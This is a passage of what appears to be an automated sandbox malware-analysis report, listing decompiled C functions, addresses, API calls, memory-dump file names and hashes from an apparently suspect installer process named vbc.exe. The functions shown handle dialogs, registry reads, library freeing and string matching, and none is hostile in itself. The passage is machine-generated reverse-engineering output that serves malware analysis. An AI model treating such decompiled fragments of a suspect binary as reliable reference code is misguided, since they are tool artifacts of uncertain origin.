                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp$C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll
                    • API String ID: 1659193697-2885240288
                    • Opcode ID: 104dd853bd667d595f2d4ef041d665a4b8afd0d56644d2e5248bfccfef6cc724
                    • Instruction ID: fdcd3470e26f59c64840f8c249bec33fde4ddddd182ca34a55142dcc3fd3dd5a
                    • Opcode Fuzzy Hash: 104dd853bd667d595f2d4ef041d665a4b8afd0d56644d2e5248bfccfef6cc724
                    • Instruction Fuzzy Hash: 6211E772A10315FACB10BBB19F4AE9E7670AF40748F21443FE002B21C1D6FD8891565E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403019(intOrPtr _a4) {
                    				long _t2;
                    				struct HWND__* _t3;
                    				struct HWND__* _t6;
                    
                    				if(_a4 == 0) {
                    					__eflags =  *0x79f700; // 0x0
                    					if(__eflags == 0) {
                    						_t2 = GetTickCount();
                    						__eflags = _t2 -  *0x7a8a6c;
                    						if(_t2 >  *0x7a8a6c) {
                    							_t3 = CreateDialogParamW( *0x7a8a60, 0x6f, 0, E00402F93, 0);
                    							 *0x79f700 = _t3;
                    							return ShowWindow(_t3, 5);
                    						}
                    						return _t2;
                    					} else {
                    						return E00406923(0);
                    					}
                    				} else {
                    					_t6 =  *0x79f700; // 0x0
                    					if(_t6 != 0) {
                    						_t6 = DestroyWindow(_t6);
                    					}
                    					 *0x79f700 = 0;
                    					return _t6;
                    				}
                    			}






                    0x00403020
                    0x0040303a
                    0x00403040
                    0x0040304a
                    0x00403050
                    0x00403056
                    0x00403067
                    0x00403070
                    0x00000000
                    0x00403075
                    0x0040307c
                    0x00403042
                    0x00403049
                    0x00403049
                    0x00403022
                    0x00403022
                    0x00403029
                    0x0040302c
                    0x0040302c
                    0x00403032
                    0x00403039
                    0x00403039

                    APIs
                    • DestroyWindow.USER32 ref: 0040302C
                    • GetTickCount.KERNEL32(00000000,004031F7,00000001,?,?,?,?,?,0040385A,?), ref: 0040304A
                    • CreateDialogParamW.USER32 ref: 00403067
                    • ShowWindow.USER32(00000000,00000005), ref: 00403075
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                    • String ID:
                    • API String ID: 2102729457-0
                    • Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                    • Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
                    • Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                    • Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E004054F0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                    				int _t15;
                    				long _t16;
                    
                    				_t15 = _a8;
                    				if(_t15 != 0x102) {
                    					if(_t15 != 0x200) {
                    						_t16 = _a16;
                    						L7:
                    						if(_t15 == 0x419 &&  *0x7a1f34 != _t16) {
                    							_push(_t16);
                    							_push(6);
                    							 *0x7a1f34 = _t16;
                    							E00404EB1();
                    						}
                    						L11:
                    						return CallWindowProcW( *0x7a1f3c, _a4, _t15, _a12, _t16);
                    					}
                    					if(IsWindowVisible(_a4) == 0) {
                    						L10:
                    						_t16 = _a16;
                    						goto L11;
                    					}
                    					_t16 = E00404E31(_a4, 1);
                    					_t15 = 0x419;
                    					goto L7;
                    				}
                    				if(_a12 != 0x20) {
                    					goto L10;
                    				}
                    				E004044C2(0x413);
                    				return 0;
                    			}





                    0x004054f4
                    0x004054fe
                    0x0040551a
                    0x0040553c
                    0x0040553f
                    0x00405545
                    0x0040554f
                    0x00405550
                    0x00405552
                    0x00405558
                    0x00405558
                    0x00405562
                    0x00000000
                    0x00405570
                    0x00405527
                    0x0040555f
                    0x0040555f
                    0x00000000
                    0x0040555f
                    0x00405533
                    0x00405535
                    0x00000000
                    0x00405535
                    0x00405504
                    0x00000000
                    0x00000000
                    0x0040550b
                    0x00000000

                    APIs
                    • IsWindowVisible.USER32(?), ref: 0040551F
                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405570
                      • Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                    • Instruction ID: 9d4fd90c1d1287ad01f41678c6dcc1ca6f3bae65868fe0495ea0105890a895ad
                    • Opcode Fuzzy Hash: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                    • Instruction Fuzzy Hash: CC01BC71100648BFEF209F11ED80A9B3B27FB84390F548037FA057A2E5C77A8D529A69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E004063E8(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                    				int _v8;
                    				long _t21;
                    				long _t24;
                    				char* _t30;
                    
                    				asm("sbb eax, eax");
                    				_v8 = 0x800;
                    				_t21 = E00406387(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                    				_t30 = _a16;
                    				if(_t21 != 0) {
                    					L4:
                    					 *_t30 =  *_t30 & 0x00000000;
                    				} else {
                    					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                    					_t21 = RegCloseKey(_a20);
                    					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                    					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                    						goto L4;
                    					}
                    				}
                    				return _t21;
                    			}







                    0x004063f6
                    0x004063f8
                    0x00406410
                    0x00406415
                    0x0040641a
                    0x00406458
                    0x00406458
                    0x0040641c
                    0x0040642e
                    0x00406439
                    0x0040643f
                    0x0040644a
                    0x00000000
                    0x00000000
                    0x0040644a
                    0x0040645e

                    APIs
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 0040642E
                    • RegCloseKey.ADVAPI32(?), ref: 00406439
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CloseQueryValue
                    • String ID: Call
                    • API String ID: 3356406503-1824292864
                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403B34() {
                    				void* _t2;
                    				void* _t3;
                    				void* _t6;
                    				void* _t8;
                    
                    				_t8 =  *0x79ff0c; // 0x9e8440
                    				_t3 = E00403B19(_t2, 0);
                    				if(_t8 != 0) {
                    					do {
                    						_t6 = _t8;
                    						_t8 =  *_t8;
                    						FreeLibrary( *(_t6 + 8));
                    						_t3 = GlobalFree(_t6);
                    					} while (_t8 != 0);
                    				}
                    				 *0x79ff0c =  *0x79ff0c & 0x00000000;
                    				return _t3;
                    			}







                    0x00403b35
                    0x00403b3d
                    0x00403b44
                    0x00403b47
                    0x00403b47
                    0x00403b49
                    0x00403b4e
                    0x00403b55
                    0x00403b5b
                    0x00403b5f
                    0x00403b60
                    0x00403b68

                    APIs
                    • FreeLibrary.KERNEL32(?,7556D4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
                    • GlobalFree.KERNEL32(009E8440), ref: 00403B55
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B34
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Free$GlobalLibrary
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 1100898210-4017390910
                    • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                    • Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
                    • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                    • Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405F6F(void* __ecx, CHAR* _a4, CHAR* _a8) {
                    				int _v8;
                    				int _t12;
                    				int _t14;
                    				int _t15;
                    				CHAR* _t17;
                    				CHAR* _t27;
                    
                    				_t12 = lstrlenA(_a8);
                    				_t27 = _a4;
                    				_v8 = _t12;
                    				while(lstrlenA(_t27) >= _v8) {
                    					_t14 = _v8;
                    					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                    					_t15 = lstrcmpiA(_t27, _a8);
                    					_t27[_v8] =  *(_t14 + _t27);
                    					if(_t15 == 0) {
                    						_t17 = _t27;
                    					} else {
                    						_t27 = CharNextA(_t27);
                    						continue;
                    					}
                    					L5:
                    					return _t17;
                    				}
                    				_t17 = 0;
                    				goto L5;
                    			}









                    0x00405f7f
                    0x00405f81
                    0x00405f84
                    0x00405fb0
                    0x00405f89
                    0x00405f92
                    0x00405f97
                    0x00405fa2
                    0x00405fa5
                    0x00405fc1
                    0x00405fa7
                    0x00405fae
                    0x00000000
                    0x00405fae
                    0x00405fba
                    0x00405fbe
                    0x00405fbe
                    0x00405fb8
                    0x00000000

                    APIs
                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F97
                    • CharNextA.USER32(00000000), ref: 00405FA8
                    • lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                    • Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
                    • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                    • Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8
                    Uniqueness

                    Uniqueness Score: -1.00%